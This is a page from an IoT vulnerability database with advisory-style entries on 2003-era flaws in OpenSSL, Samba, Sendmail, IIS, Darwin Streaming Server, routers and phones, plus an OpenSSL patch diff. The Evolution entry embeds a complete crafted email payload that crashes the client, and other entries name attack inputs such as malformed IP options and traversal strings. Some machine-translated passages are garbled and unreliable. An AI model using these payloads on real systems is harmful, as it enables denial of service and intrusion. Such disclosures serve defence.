VARIoT IoT vulnerabilities database

The 3com SuperStack II Remote Access System 1500 is a device that accesses telecommunications equipment through BRI-ISDN/analog lines. Some files in the 3com SuperStack II remote access system can be accessed without authorization. Remote attackers can use this vulnerability to obtain sensitive information about system devices. RAS 1500 only protects the download.htm file (download manager for configuration files and system software), requires HTTP BASIC authentication, and does not have any protection for system image files and configuration files. Attackers can be unauthorized. Access these files for sensitive information. Specifically, RAS 1500 devices fail to carry out authentication when requests are made for various files that may contain sensitive information

The 3com SuperStack II Remote Access System 1500 is a device that accesses telecommunications equipment through BRI-ISDN/analog lines. The 3com SuperStack II remote access system handles malformed packets incorrectly, and remote attackers can exploit this vulnerability to perform denial of service attacks on devices. The attacker sends a packet with the IP option length field set to zero to the RAS 1500 system, which can cause the device to reboot and disconnect all connections. A vulnerability has been reported in the 3Com SuperStack II RAS 1500 router. The problem occurs when processing network packets containing malicious IP headers. When received, the packet may cause the router to crash

Buffer overflow in IBM Tivoli Firewall Toolbox (TFST) 1.2 allows remote attackers to execute arbitrary code via unknown vectors. A vulnerability in the Tivoli Firewall Toolbox version 1.2 has been discovered that can lead to remote unauthorized compromise of the environment with in the firewall system. The problem exists because the Firewall Security Toolbox relay daemon fails to perform adequate bounds checking on received data. The relay daemon process included in TFST listens to the TCP network socket. When storing data from the Tivoli node to the memory buffer, no boundary check operation is performed. If a forged Tivoli node provides a large amount of data, it can Buffer overflow occurs in the Relay daemon program, and important program control data in the control stack can cause arbitrary instructions to be executed on the system with the Relay process authority. Under the Unix platform, the \'\'nobody\'\' authority is generally used

The SSL and TLS components for OpenSSL 0.9.6i and earlier, 0.9.7, and 0.9.7a allow remote attackers to perform an unauthorized RSA private key operation via a modified Bleichenbacher attack that uses a large number of SSL or TLS connections using PKCS #1 v1.5 padding that cause OpenSSL to leak information regarding the relationship between ciphertext and the associated plaintext, aka the "Klima-Pokorny-Rosa attack.". SSL/TLS implementations that respond distinctively to an incorrect PKCS #1 v1.5 encoded SSL/TLS version number expose the premaster secret to a modified Bleichenbacher attack. An attacker could decrypt a given SSL/TLS session or forge a signature on behalf of a vulnerable application's private RSA key. OpenSSL In RSA Is used for the encryption algorithm, PKCS#1 Secret value shared across the session between the client and server due to inadequate version number handling in the process ) There is a vulnerability that leaks.There is a possibility of decrypting the encrypted communication content. A problem with OpenSSL may leak sensitive information. A user could abuse the response of vulnerable servers to act as an oracle. By sending a large number of adaptive attacks, the possibility exists for a remote user to create a choice of ciphertext encrypted with the private key of the server. OpenSSL Security Advisory [19 March 2003] Klima-Pokorny-Rosa attack on RSA in SSL/TLS =========================================== Czech cryptologists Vlastimil Klima, Ondrej Pokorny, and Tomas Rosa have come up with an extension of the "Bleichenbacher attack" on RSA with PKCS #1 v1.5 padding as used in SSL 3.0 and TLS 1.0. Note that the server's RSA key is not compromised in this attack. OpenSSL releases up to 0.9.6i and 0.9.7a are vulnerable. The enclosed patch modifies SSL/TLS server behaviour to avoid the vulnerability. Security Patch -------------- The following patch can be applied to OpenSSL releases 0.9.6b up to 0.9.6i, 0.9.7, and 0.9.7a. --- s3_srvr.c 29 Nov 2002 11:31:51 -0000 1.85.2.14 +++ s3_srvr.c 19 Mar 2003 18:00:00 -0000 @@ -1447,7 +1447,7 @@ if (i != SSL_MAX_MASTER_KEY_LENGTH) { al=SSL_AD_DECODE_ERROR; - SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_RSA_DECRYPT); + /* SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_RSA_DECRYPT); */ } if ((al == -1) && !((p[0] == (s->client_version>>8)) && (p[1] == (s->client_version & 0xff)))) @@ -1463,30 +1463,29 @@ (p[0] == (s->version>>8)) && (p[1] == (s->version & 0xff)))) { al=SSL_AD_DECODE_ERROR; - SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_PROTOCOL_VERSION_NUMBER); - goto f_err; + /* SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_PROTOCOL_VERSION_NUMBER); */ + + /* The Klima-Pokorny-Rosa extension of Bleichenbacher's attack + * (https://eprint.iacr.org/2003/052/) exploits the version + * number check as a "bad version oracle" -- an alert would + * reveal that the plaintext corresponding to some ciphertext + * made up by the adversary is properly formatted except + * that the version number is wrong. To avoid such attacks, + * we should treat this just like any other decryption error. */ + p[0] = (char)(int) "CAN-2003-0131 patch 2003-03-19"; } } if (al != -1) { -#if 0 - goto f_err; -#else /* Some decryption failure -- use random value instead as countermeasure * against Bleichenbacher's attack on PKCS #1 v1.5 RSA padding - * (see RFC 2246, section 7.4.7.1). - * But note that due to length and protocol version checking, the - * attack is impractical anyway (see section 5 in D. Bleichenbacher: - * "Chosen Ciphertext Attacks Against Protocols Based on the RSA - * Encryption Standard PKCS #1", CRYPTO '98, LNCS 1462, pp. 1-12). - */ + * (see RFC 2246, section 7.4.7.1). */ ERR_clear_error(); i = SSL_MAX_MASTER_KEY_LENGTH; p[0] = s->client_version >> 8; p[1] = s->client_version & 0xff; RAND_pseudo_bytes(p+2, i-2); /* should be RAND_bytes, but we cannot work around a failure */ -#endif } s->session->master_key_length= References ---------- Report "Attacking RSA-based Sessions in SSL/TLS" by V. Klima, O. Pokorny, and T. Rosa: https://eprint.iacr.org/2003/052/ The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0131 to this issue. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0131 URL for this Security Advisory: https://www.openssl.org/news/secadv_20030319.txt

The web interface for SOHO Routefinder 550 firmware 4.63 and earlier, and possibly later versions, has a default "admin" account with a blank password, which could allow attackers on the LAN side to conduct unauthorized activities. RouteFinder 550 VPN is prone to a remote security vulnerability

XimiaXimian Evolution, an integrated personal information management solution for the Linux platform. A denial of service vulnerability exists in Ximian Evolution Mail User Agent 1.2.2 and earlier. A remote attacker sends a message that has been encoded by uuencode multiple times. The server tries to allocate a large amount of memory until it crashes. Three times uuedcode may cause the system to crash due to resource exhaustion. Test Code: From xxx@corest.com Wed Mar 5 14:06:02 2003 Subject: xxx From: X X. X <xxx@corest.com> To: xxx@corest.com Content-Type: multipart/mixed; Boundary=3D\"=3D-mTDu5zdJIsixETTwCF5Y\" Message-Id: <1046884154.1731.5.camel@vaiolin> Mime-Version: 1.0 Date: 05 Mar 2003 14:09:14 -0300 --=3D-mTDu5zdJIsixETTwCF5Y Content-Disposition: Inline; filename=3Dname Content-Type: application/octet-stream; name=3Dname Content-Transfer-Encoding: 7bit begin 600 phase2 M8F5G:6X@-CP('!H87-E,0I-.$8U1SHV6$ M0R!0 *\"<Q13XG,\"HS,RA&+310 M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-\"*2 R,D19\"DTP0B4Y+E4\\5# C M138W- 3!(*5,E+RHB/%$R(TA7*R0@7\"E%52DN5#Q0,T!)+2I4*$$V,TTW+20M7#%#,2 *32\\D.% 4P,T1',20@72E%42 O,SQ-,3) 1\"LR7%0Q(S$@+$,Q-2PC M(%0K,S!(+$(Q(2A$(2DQ4TTR* #1 6 I-+4)5*R)$-$@I5#4O+S,\\23131%8T M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ -,3-!-RTU*%HM4R4Y\"C,J5#A- ?,U-,4#(B2$(P*B! (D(@*CDV640B0\" @\"B *96YD\"@ end --= 3D-mTDu5zdJIsixETTwCF5Y-- Patching: Install the upgrade patch, patch download location: Red Hat Upgrade evolution -1.0.8-11.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/evolution-1.0.8-11.i386.rpm Red Hat Linux 8.0 Red Hat Upgrade evolution-1.0. 8-9.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/evolution-1.0.8-9.7x.i386.rpm Red Hat Linux 7.3 Red Hat Upgrade gal-0.19.2 -3.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/gal-0.19.2-3.7x.i386.rpm Red Hat Linux 7.3 Red Hat Upgrade gal-devel-0.19. 2-3.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/gal-devel-0.19.2-3.7x.i386.rpm Red Hat Linux 7.3 Red Hat Upgrade libgal19-0.19 .2-3.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/libgal19-0.19.2-3.7x.i386.rpm Ximian ------ Upgrade to 1.2. Version 3: http://www.ximian.com/products/ximian_evolution/

Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code. Samba contains several buffer overflow vulnerabilitites. Samba contains several buffer overflow vulnerabilitites. An updated version has been released. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ Samba 2.2.8 Previously, when dealing with files with very long file names, smbd/trans2.c Inside StrnCpy() There is a problem with buffer overflow in functions. StrnCpy(fname,pname,namelen) Marked StrnCpy() In the function namelen using pstring Type (1024 Byte char Type array ) Variables fname Within pname Copy for that reason, pname In 1024 By giving a value larger than bytes, it is possible to cause a buffer overflow and overwrite the memory area. (CAN-2003-0201) In addition, there are other potential buffer overflow issues that stem from this issue. 3 Have been found by vendors (CAN-2003-0196) , A corrected version for all these issues Samba 2.2.8a Is published. At this time, this problem (CAN-2003-0196) Details of are unknown.Please refer to the “Overview” for the impact of this vulnerability. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory. Samba-TNG 0.3.1 and earlier are also affected

Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. This vulnerability, which is being actively exploited on WebDAV-enabled IIS 5.0 servers, will allow a remote attacker to execute arbitrary code on unpatched systems. Sites running Microsoft Windows should apply a patch or disable WebDAV services as soon as possible. The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances. ** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks. ** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function. ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability

OpenSSL does not use RSA blinding by default, which allows local and remote attackers to obtain the server's private key by determining factors using timing differences on (1) the number of extra reductions during Montgomery reduction, and (2) the use of different integer multiplication algorithms ("Karatsuba" and normal). Cryptographic libraries and applications do not provide adequate defense against a side-channel timing attack against RSA private keys. Such an attack has been shown to be practical using currently available hardware on systems and networks with sufficiently low variance in latency. OpenSSL so RSA Is used for the encryption algorithm, RSA There is a vulnerability that is subject to timing attacks that can analyze the private key by measuring and analyzing the processing time when generating the private key in the format.The server's private key may be obtained. A side-channel attack in the OpenSSL implementation has been published in a recent paper that may ultimately result in an active adversary gaining the RSA private key of a target server. The attack involves analysis of the timing of certain operations during client-server session key negotiation

Buffer overflow in the web interface for SOHO Routefinder 550 before firmware 4.63 allows remote attackers to cause a denial of service (reboot) and execute arbitrary code via a long GET /OPTIONS value. A vulnerability has been discovered in Multitech RouteFinder 550 VPN firmware release 4.63 and earlier. The problem occurs due to insufficient bounds checking of data supplied in HTTP GET requests. By passing excessive data to the device it may be possible for a remote attacker to corrupt memory. Successful exploitation of this bug may result in a denial of service, causing the device to crash. Although it has not been confirmed, it may also be possible for an attacker to exploit this issue to execute arbitrary commands

Siemens * 35 and * 45 support SMS services.  Siemens * 35 and * 45 series mobile phones have vulnerabilities when receiving special text messages. Remote attackers can use this vulnerability to conduct denial of service attacks on mobile phones.  The attacker sends a message in the form of "% String" to Siemens * 35 and * 45 series mobile phones, which can cause the * 35 mobile phones to stop working and cause the * 45 series mobile phones to have a 2 minute read delay. Note that hostile characters must be capitalized And the message needs to be quoted.  Cell phones can drain their batteries after receiving 10-15 similar messages.  There is also a similar form of local vulnerability. Messages of the form "% some_word" (lowercase characters) can also cause the above problems.

The JetDirect printer is a printer with integrated network capabilities developed by Hewlett Packard. The HP JetDirect printer does not properly handle certain SNMP GET requests, which can be exploited by remote attackers to obtain printer device passwords and change printer settings. The attacker sends a special SNMP GET request to the printer with this vulnerability. The printer returns a hexadecimal device password to the requester, which allows the remote user to access and change the printer's configuration settings. This vulnerability is different from the \"HP JetDirect Printer SNMP GET Get Administrator Password Remote Vulnerability\" ( http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=3172 ). The requested OID is different. It has been reported that HP JetDirect printers leak the web JetAdmin device password under some circumstances

Buffer overflow in Sendmail 5.79 to 8.12.7 allows remote attackers to execute arbitrary code via certain formatted address fields, related to sender and recipient header comments as processed by the crackaddr function of headers.c. sendmail A buffer overflow vulnerability was discovered in message processing. The vulnerability could allow a third party to gain administrative privileges remotely. This problem, sendmail is caused by receiving a message with maliciously constructed header information. For this reason, LAN is running on a host installed within sendmail Even other MTA (Mail Transfer Agent) You may be affected by the vulnerability if you receive a malicious message relayed from .A third party may be able to remotely obtain administrator privileges. Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers. Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid. Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree. Most organizations have various mail transfer agents (MTAs) at various locations within their network, at least one of which is directly connected to the Internet. According to statistics, Internet mail traffic handled by Sendmail accounts for 50\\% to 75\\% of the total. Many UNIX and Linux workstations run Sendmail by default. When an email header contains an address or address list (eg \"From\", \"To\", \"CC\"), Sendmail will attempt to check whether the provided address or address list is valid. Sendmail does this using the crackaddr() function, which is located in the headers.c file in the Sendmail source tree. Sendmail will check this buffer and stop adding data to it if it is found to be full. Sendmail goes through several safety checks to ensure that characters are interpreted correctly. On most Unix or Linux systems, Sendmail runs as the root user. Because the attack code can be included in what appears to be a normal email message, it can easily penetrate many common packet filtering devices or firewalls without being detected. Successful exploitation of an unpatched sendmail system leaves no messages in the syslog. However, on patched systems, attempts to exploit this vulnerability leave the following log message: Dropped invalid comments from header address This vulnerability affects both the commercial and open source versions of Sendmail, and is also reported to have been tested in the lab environment has been successfully exploited

US Robotics offers a wide range of broadband router devices, including the US Robotics Broadband-Router 8000A/8000-2 (USR848000A-02). The US Robotics 8000A/8000-2 broadband router lacks proper handling of long GET requests, and remote attackers can exploit this vulnerability to perform denial of service attacks on routers. The US Robotics 8000A/8000-2 broadband router includes an embedded WEB service program. Due to the lack of proper handling of long GET requests, an attacker submitting a long malicious input can cause the device to crash and generate a denial of service attack. USRobotics Broadband-Routers are reportedly prone to denial of service attacks. An attacker can exploit this vulnerability by issuing an overly long GET request to the embedded web server of a vulnerable USRobotics device. When the device attempts to process the malformed input, it will crash. It has been reported that this condition may be reproduced from within the internal network. This condition may be due to a buffer overflow. This issue is reported to affect v2.5 of US Robotics Broadband-Router 8000A/8000-2 (USR848000A-02)

It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.

parse_xml.cgi in Apple Darwin Streaming Server 4.1.1 allows remote attackers to determine the existence of arbitrary files by using ".." sequences in the filename parameter and comparing the resulting error messages. It has been reported that the QuickTime/Darwin Streaming Server reveals information that may be sensitive. When certain requests are made, a difference in reponses could make possible for an attacker to gain information about the local host. There is a vulnerability in parse_xml.cgi of Apple Darwin Streaming Server 4.1.1

Directory traversal vulnerability in parse_xml.cg Apple Darwin Streaming Server 4.1.2 and Apple Quicktime Streaming Server 4.1.1 allows remote attackers to read arbitrary files via a ... (triple dot) in the filename parameter. The vulnerability exists due to insufficient sanitization of some parameters given to the parse_xml.cgi script. Information obtained in this manner may be used by an attacker to launch more organinzed attacks against a vulnerable system. This vulnerability was tested on SS for Microsoft Windows systems. Remote attackers can read arbitrary files with the help of the ..

Buffer overflow in the MP3 broadcasting module of Apple Darwin Streaming Administration Server 4.1.2 and QuickTime Streaming Server 4.1.1 allows remote attackers to execute arbitrary code via a long filename. A vulnerability has been discovered in the Quicktime/Darwin MP3 Broadcaster. The problem occurs due to insufficient bounds checking on MP3 filenames. Processing an MP3 file with a name of excessive length may trigger the condition, effectively causing memory to be overwritten. This issue may be exploitable by a remote attacker to execute arbitrary commands with the privileges of the user running the vulnerable application. By default, these services listen on port 1220/TCP with root user privileges. A remote or local attacker could exploit this vulnerability to serve malicious MP3 files and trigger a buffer overflow. When the MP3 broadcast module processes MP3 files with file names exceeding 256 bytes, buffer overflow may occur

Cross-site scripting (XSS) vulnerability in parse_xml.cgi in Apple Darwin Streaming Administration Server 4.1.2 and QuickTime Streaming Server 4.1.1 allows remote attackers to insert arbitrary script via the filename parameter, which is inserted into an error message. When an invalid filename is specified from this page, it is output to an error page without sufficient sanitization of HTML and script code. This may permit cross-site scripting attacks to occur if an attacker constructs a malicious link to the page and can entice web users to visit it. Apple Darwin and QuickTime stream management server is a WEB-based service that allows administrators to manage Darwin and QuickTime stream servers. By default, these services listen to port 1220/TCP with ROOT privileges. The parse_xml.cgi of the Darwin/QuickTime streaming server does not sufficiently filter the non-existing file name parameters. If an attacker passes a non-existent file name parameter to the parse_xml.cgi script, the script will generate an error message and record it. If the parameter provided by the attacker contains malicious script code, the administrator can use the Script code is executed on the browser

parse_xml.cgi in Apple Darwin Streaming Administration Server 4.1.2 and QuickTime Streaming Server 4.1.1 allows remote attackers to list arbitrary directories. This may lead to disclosure of sensitive information which may aid in further attacks against the system hosting the software. The attacker may need to view the source code of the page to view the directory listing output. By default, these services listen on port 1220/TCP with root user privileges. The parse_xml.cgi of the Darwin/QuickTime streaming server does not adequately filter user-submitted input. The Darwin stream management server relies on the parse_xml.cgi application program to authenticate and interact with users. This CGI is written in PERL. Because the program uses the open() function incorrectly, an attacker can use this function to open directory nodes under the UNIX operating system, resulting in For information leakage, there are also vulnerabilities that allow attackers to view source code information of WEB scripts